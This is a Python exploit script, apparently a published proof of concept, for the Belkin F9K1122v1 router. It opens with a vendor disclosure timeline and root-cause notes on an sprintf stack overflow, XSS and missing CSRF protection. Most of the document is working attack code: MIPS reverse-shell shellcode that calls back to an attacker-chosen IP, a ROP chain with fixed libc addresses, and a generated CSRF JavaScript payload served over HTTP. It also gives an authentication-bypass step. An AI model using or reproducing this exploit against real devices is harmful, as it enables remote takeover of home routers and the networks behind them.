1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266 | import socket, sys , base64, struct, string, urllib
from getopt import getopt as GetOpt, GetoptError
from uuid import getnode as get_mac
import SimpleHTTPServer, SocketServer
# TIMELINE #
'''
3/16/2016 - First Submission to Belkin [no response]
5/3/2016 - Second Submission to Belkin [no response]
6/4/2016 - Notification of 0day [vendor responded]
Vendor Response: Our email system was broken but we want another 90 days.
9/3/2016 - Notification of 0day sent to Belkin. [no response]
9/4/2016 - The second 90 day extension is over.
'''
# Root cause analysis and all of that fun stuff
'''
This is the CSRF PoC. You will need to embed your JS soruce somewhere. '<script src=//ip.addr/a.js>'
The SSID of the F9K1122v1 does not escape HTML chars so XSS is possible.
XSS is also possible during provisioning. It does not escape HTML chars while scanning for SSIDs.
There is no protection against CSRFs so I made this CSRF PoC.
The BoF Vulnerability:
File Name: fmmgmt.c
-------------------------------------------------------------
void formSetLanguage(webs_t wp, char_t *path, char_t *query)
{
[CUT]
...
if(apmib_set(MIB_WEB_LANGUAGE, (void *)&type)==0){
strcpy(tmpbuf, T("Set WEB language error!"));
goto setErr;
}
apmib_update(CURRENT_SETTING);
setErr:
urltmp = websGetVar(wp, T("webpage"), T(""));
sprintf(tmpbuf, "/%s", urltmp);
-------------------------------------------------------------
In a nutshell, cause the error and then the webpage parameter will get picked up and then sprintf! yay!
ASLR is broken on this device so ret2libc is possible. Stack + Heap = Executable.
'''
# GREETZ
'''
@AustinHackers - I love you all <3
@Laughing_Mantis - Cause I said I would!
@MisterCh0c - Keep on h4x0ring IoT products!
@IoTVillage - You guys rock!
@HeadlessZeke - Thanks for influcencing me to challenge myself aka I wanted to show you up :D
@avicoder - cause you're awesome! :D
@TheZDI - If it weren't for your comment of wanting me to bypass auth then I wouldn't of found these vulns.
Everyone over at Praetorian - You guys are awesome <3.
'''
def usage():
print ""
print "CSRF Generator --> Buffer Overflow PoC [Needs to be ran as a SuperUser]"
print "By: Elvis Collado [b1ack0wl]"
print ""
print "Usage: %s -s source.ip -d dst.ip" % sys.argv[0]
print ""
print "\t-s Connect back IP [LHOST]"
print "\t-d Destination IP of Socket Listener [RHOST]"
print "\t-h Print this Help Menu"
print ""
sys.exit(1)
# Hacky but whatever it gets the point across.
if len(sys.argv) < 3:
usage()
try:
(opts, args) = GetOpt(sys.argv[1:], 's:d:h')
except GetoptError, e:
usage()
for opt, arg in opts:
if opt == "-s":
connectback_ip = arg.split(".")
for a in connectback_ip:
if int(a) == 0:
print "IP cannot have NULL Bytes :("
sys.exit(1)
IP_1= struct.pack("<B",int(connectback_ip[0]))
IP_2= struct.pack("<B",int(connectback_ip[1]))
IP_3= struct.pack("<B",int(connectback_ip[2]))
IP_4= struct.pack("<B",int(connectback_ip[3]))
elif opt == "-d":
host = arg
elif opt == "-h":
usage()
# Shellcode from bowcaster.
shellcode = string.join([
"\x24\x0f\xff\xfa", # li t7,-6
"\x01\xe0\x78\x27", # nor t7,t7,zero
"\x21\xe4\xff\xfd", # addi a0,t7,-3
"\x21\xe5\xff\xfd", # addi a1,t7,-3
"\x28\x06\xff\xff", # slti a2,zero,-1
"\x24\x02\x10\x57", # li v0,4183
"\x01\x01\x01\x0c", # syscall 0x40404
"\xaf\xa2\xff\xff", # sw v0,-1(sp)
"\x8f\xa4\xff\xff", # lw a0,-1(sp)
"\x34\x0f\xff\xfd", # li t7,0xfffd
"\x01\xe0\x78\x27", # nor t7,t7,zero
"\xaf\xaf\xff\xe0", # sw t7,-32(sp)
# Port 8080
"\x3c\x0e\x1f\x90", # lui t6,0x1f90
"\x35\xce\x1f\x90", # ori t6,t6,0x1f90
# Store Port
"\xaf\xae\xff\xe4", # sw t6,-28(sp)
# Big endian IP address 192.168.206.2
"\x3c\x0e"+IP_1+IP_2, # lui t6,0x7f01
"\x35\xce"+IP_3+IP_4, # ori t6,t6,0x101
"\xaf\xae\xff\xe6", # sw t6,-26(sp)
"\x27\xa5\xff\xe2", # addiu a1,sp,-30
"\x24\x0c\xff\xef", # li t4,-17
"\x01\x80\x30\x27", # nor a2,t4,zero
"\x24\x02\x10\x4a", # li v0,4170
"\x01\x01\x01\x0c", # syscall 0x40404
"\x24\x0f\xff\xfd", # li t7,-3
"\x01\xe0\x78\x27", # nor t7,t7,zero
"\x8f\xa4\xff\xff", # lw a0,-1(sp)
"\x01\xe0\x28\x21", # move a1,t7
"\x24\x02\x0f\xdf", # li v0,4063
"\x01\x01\x01\x0c", # syscall 0x40404
"\x24\x10\xff\xff", # li s0,-1
"\x21\xef\xff\xff", # addi t7,t7,-1
"\x15\xf0\xff\xfa", # bne t7,s0,68 <dup2_loop>
"\x28\x06\xff\xff", # slti a2,zero,-1
"\x3c\x0f\x2f\x2f", # lui t7,0x2f2f
"\x35\xef\x62\x69", # ori t7,t7,0x6269
"\xaf\xaf\xff\xec", # sw t7,-20(sp)
"\x3c\x0e\x6e\x2f", # lui t6,0x6e2f
"\x35\xce\x73\x68", # ori t6,t6,0x7368
"\xaf\xae\xff\xf0", # sw t6,-16(sp)
"\xaf\xa0\xff\xf4", # sw zero,-12(sp)
"\x27\xa4\xff\xec", # addiu a0,sp,-20
"\xaf\xa4\xff\xf8", # sw a0,-8(sp)
"\xaf\xa0\xff\xfc", # sw zero,-4(sp)
"\x27\xa5\xff\xf8", # addiu a1,sp,-8
"\x24\x02\x0f\xab", # li v0,4011
"\x01\x01\x01\x0c" # syscall 0x40404
], '')
# getRect() son
huge_string = "IMETHANBRADBERRY " * 6 # I was watching A LOT of Youtube at the time. So I made my padding "IMETHANBRADBERRY" cause it made me lol. :D
huge_string += "!" # Filler
huge_string += struct.pack(">L", 0x2aaf2c80) # s0 Function to LIBC Sleep
huge_string += "\x43\x43\x43\x43" # s1 but after sleep it's just padding
huge_string += struct.pack(">L",0x2aafc840) # RA OverWrite # move t9,s0 jalr t9
huge_string += "\x44\x44\x44\x44" * 6 # padding
huge_string += struct.pack(">L",0x31313131) # s0 - Sleep
huge_string += struct.pack(">L",0x2aafc840) # s1
huge_string += struct.pack(">L",0x34343434) # s2
huge_string += struct.pack(">L",0x2aaf9f38) # Second Rop Chain RA
huge_string += "\x45\x45\x45\x45" * 9 # Padding
huge_string += struct.pack(">L",0x2aaf9808) # Third ROP Chain RA
huge_string += "\x46\x46\x46\x46" * 10
huge_string += struct.pack(">L",0x2739e8b8) # Hacky NOP Sled YoloSwagSecurity(tm) Style :D
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2aaf97fc) # Fourth ROP Chain (Stack Exec). $PC will point to the Hacky NOP Sled.
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += "\x47\x47\x47\x47" # Padding becomes NULL
huge_string += shellcode # shellcode start
'''
NOTES
libc = 0x2aad0000
0x2aafc840 (Sleep)
Gadget 1
0x2aafc840: move t9,s0 # Sleep
0x2aafc844: jalr t9 # call sleep. The rest of the instructions will not block out payload and are not included.
Gadget 2
0x2aaf9f38: move t9,s1 # Addr to Gadget 3
0x2aaf9f3c: lw ra,52(sp)
0x2aaf9f40: lw s3,48(sp)
0x2aaf9f44: lw s2,44(sp)
0x2aaf9f48: lw s1,40(sp)
0x2aaf9f4c: lw s0,36(sp)
0x2aaf9f50: jr t9 # Call Gadget 3
Gadget 3
0x2aaf9808: addiu a0,sp,24 # Add offet +24 to SP and store it in A0
0x2aaf980c: lw ra,52(sp) # load Ret addr
0x2aaf9810: jr ra # ret
Gadget 4 (Stack Exec)
0x2aaf97fc: move t9,a0 # move A0 which contains the address of the stack
0x2aaf9800: sw v0,24(sp)
0x2aaf9804: jalr t9 # Jump to the stack
0x2aaf9808: addiu a0,sp,24 # Before jumping, add +24 to the stack and store it in A0
'''
csrf_file = open('a.js', 'wb')
params = urllib.urlencode({'webpage': huge_string}) # Vulnerable parameter
destination_addr = 'x.open("POST", "http://' + host + '/goform/formSetLanguage"' + ',true);\n' # Vulnerable Endpoint that does not require authentication
# Write CSRF PoC
csrf_file.write('function getrekt(){')
csrf_file.write('var x = new XMLHttpRequest();\n')
csrf_file.write(destination_addr)
csrf_file.write('x.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); \n')
csrf_file.write('x.send("' + params + '");')
csrf_file.write('}\ngetrekt();')
# Close file since we're doing writing to it.
csrf_file.close()
# Now Host the CSRF File
mac = get_mac()
PORT = 80 # This is why superuser rights are needed
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
mac_addr = ':'.join(("%012X" % mac)[i:i+2] for i in range(0, 12, 2))
print "[\033[1;32m+\033[0m] Serving CSRF File on port:", PORT
print "[\033[1;32m+\033[0m] Copy the following string to bypass HTTPd authentication: \033[1;33m" + "echo \"" + mac_addr.lower() + "\" > /var/remote_mac_addr\033[0m"
httpd.serve_forever()
|